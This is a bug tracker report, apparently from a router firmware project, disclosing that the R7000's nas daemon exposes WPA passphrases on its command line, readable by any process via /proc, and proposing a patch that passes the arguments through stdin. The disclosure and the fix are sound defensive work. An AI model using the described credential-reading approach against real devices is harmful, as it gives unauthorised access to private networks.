nas daemon leaks WPA secrets on R7000
|Reported by:||jpap00||Owned by:|
On R7000 there is a closed-source
nas daemon that leaks the WPA passwords associated with each wireless interface, by having them exposed on its command line:
nas -P /tmp/nas.wl1lan.pid -H 34954 -l br0 -i eth2 -A -m 128 -k [WPASECRET] -s home2N -w 2 -g 3600 nas -P /tmp/nas.wl0lan.pid -H 34954 -l br0 -i eth1 -A -m 128 -k [WPASECRET] -s home2 -w 2 -g 3600
This is undesirable because all process have read access to the
/proc tree and a vulnerability in a network daemon may result in the command line of the
nas daemon being exposed, via
/proc/$PID/cmdline, where the attacker can guess
$PID until it is found. The daemon does not have to be running as root, nor does it require shell access or equivalent. The vulnerability only requires that any process on the system be able to read a world-readable file on the filesystem.
If the attacker is in close proximity to the wireless network, they could then associate and have full unrestricted access to the private LAN.
It is desirable to hide the command-line arguments from all processes, by:
- Modifying the
nasbinary to accept arguments via stdin, or a configuration file. Unfortunately the
nasbinary is closed source, so this can only be done by BrainSlayer?.
- Interposing the
nasbinary so that arguments can be passed via stdin without the need to modify the binary itself.
Attached is a patch that takes the second approach, utilizing a new shared object
/usr/lib/interpose.so that leverages the loader to insert itself into the
nas binary before it executes, to retrieve the command line arguments via a stdin pipe, passing these to the regular
nas main() function as it starts up. Modifications are accordingly made to the
/lib/services.so library so that the above code-path is taken when launching the
The resulting command line arguments appear to other processes as follows:
nas <redacted> nas <redacted>